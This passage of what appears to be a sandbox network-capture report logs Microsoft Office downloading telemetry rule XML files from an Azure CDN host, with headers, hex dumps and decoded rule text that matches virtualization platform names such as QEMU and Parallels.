                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 485
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB9769355"
                                                                                                                                                                                  x-ms-request-id: 9ca94d1e-301e-0000-0f9c-3beecc000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134729Z-174c587ffdfldtt2hC1TEBwv9c00000002sg00000000gv09
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:29 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  72192.168.2.44986513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:29 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:29 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 470
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                  ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                  x-ms-request-id: 43d09947-101e-005a-2421-3c882b000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134729Z-178bfbc474bgvl54hC1NYCsfuw00000004mg000000002rw3
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:29 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  73192.168.2.44986613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:29 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:29 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 427
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB556A907"
                                                                                                                                                                                  x-ms-request-id: 2145ee07-e01e-003c-0347-3cc70b000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134729Z-178bfbc474bwh9gmhC1NYCy3rs00000004gg00000000f6yw
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:29 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  74192.168.2.44986413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:29 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:29 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 411
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                  ETag: "0x8DC582B989AF051"
                                                                                                                                                                                  x-ms-request-id: 961908b5-401e-0016-178c-3a53e0000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134729Z-174c587ffdfmrvb9hC1TEBtn3800000002xg00000000ke60
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:29 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  75192.168.2.44986713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:29 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:29 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 502
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                  x-ms-request-id: 5c70d6ce-001e-00ad-368c-3a554b000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134729Z-178bfbc474bw8bwphC1NYC38b400000004cg0000000085b5
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:29 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  76192.168.2.44986813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:31 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:31 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 407
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                  x-ms-request-id: 04c68412-701e-000d-5268-3b6de3000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134731Z-178bfbc474bvjk8shC1NYC83ns000000049000000000gvka
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:31 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  77192.168.2.44986913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:31 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:31 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 474
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                  x-ms-request-id: f3939d66-c01e-00ad-3d3c-3ca2b9000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134731Z-178bfbc474bwlrhlhC1NYCy3kg00000004kg000000006uyw
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:32 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  78192.168.2.44987013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:31 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:32 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 408
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                  x-ms-request-id: ecab23c4-c01e-00ad-2963-3ba2b9000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134732Z-178bfbc474b9fdhphC1NYCac0n00000004cg00000000ewp9
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:32 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  79192.168.2.44987213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:31 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:32 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 416
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                  x-ms-request-id: 9cc78053-901e-008f-7b8c-3a67a6000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134732Z-174c587ffdfn4nhwhC1TEB2nbc000000032g00000000b6wb
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:32 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  80192.168.2.44987113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:31 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:32 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 469
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                  x-ms-request-id: edaf41ae-201e-0051-5e49-3c7340000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134732Z-174c587ffdftjz9shC1TEBsh9800000002yg0000000030q1
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:32 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  81192.168.2.44987313.107.246.63443
